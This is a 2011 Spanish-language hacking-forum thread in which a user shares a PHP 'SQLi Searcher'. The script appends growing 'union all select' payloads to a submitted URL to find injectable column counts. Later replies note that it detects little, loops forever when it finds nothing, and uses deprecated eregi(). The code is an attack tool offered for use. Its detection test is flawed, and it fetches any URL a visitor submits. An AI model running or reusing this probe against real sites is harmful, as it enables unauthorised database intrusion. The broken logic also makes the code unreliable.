[Código-PHP] SQLi Searcher V1 - JaAViEr

Iniciado por JaAViEr, Junio 04, 2011, 11:46:12 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 04, 2011, 11:46:12 PM Ultima modificación: Marzo 22, 2014, 02:18:29 PM por Expermicid
Luego de hacerlo en Python -> No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Traigo la versión PHP para quienes no tenga Python :P
Código: php

<form action=? method=post>
URL:<input name=url><br/>
<input type=SUBMIT><br />
<?php
$url=$_REQUEST['url'];
if($url==NULL){exit;}
$temp="-1+union+all+select+";$i=1;
for(;;){
$temp.="$i,";
$injection=substr($temp,0,-1);
$c=file_get_contents("$url$injection");
if(!eregi("The used SELECT",$c) || !eregi("mysql_fetch",$c)){
echo "Injection encontrada  <a href=$url$injection>VER !</a><br /><br />";
exit;
}
$i++;
}
?>

Saludos UnderC0de ;)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 05, 2011, 11:15:20 AM #1
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.

Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.

Tambien estas utilizando funciones obsoletas como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y el código se puede optimizar mucho mas.

Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Junio 05, 2011, 05:29:40 PM #2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.

Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.

Tambien estas utilizando funciones obsoletas como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y el código se puede optimizar mucho mas.

Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Thanks you.
Sobre el eregi() lo usé porque otros como stristr y esas madres no me ayudaban mucho :-\
Ya sabía que lidiaba con algo "obsoleto"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 05, 2011, 05:59:05 PM #3
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.

Saludos y espero ver el source mejorado.

Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Junio 05, 2011, 06:30:48 PM #4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.

Saludos y espero ver el source mejorado.

Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Claro, si te refieres a que está en Python.
No lo hago para que sea mejor, lo hago para que haya diversidad de posibilidades.
PHP es más accesible que Python , pues lo puedes ejecutar desde una web.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Imprimir
Ir Arriba Páginas1
Acciones del Usuario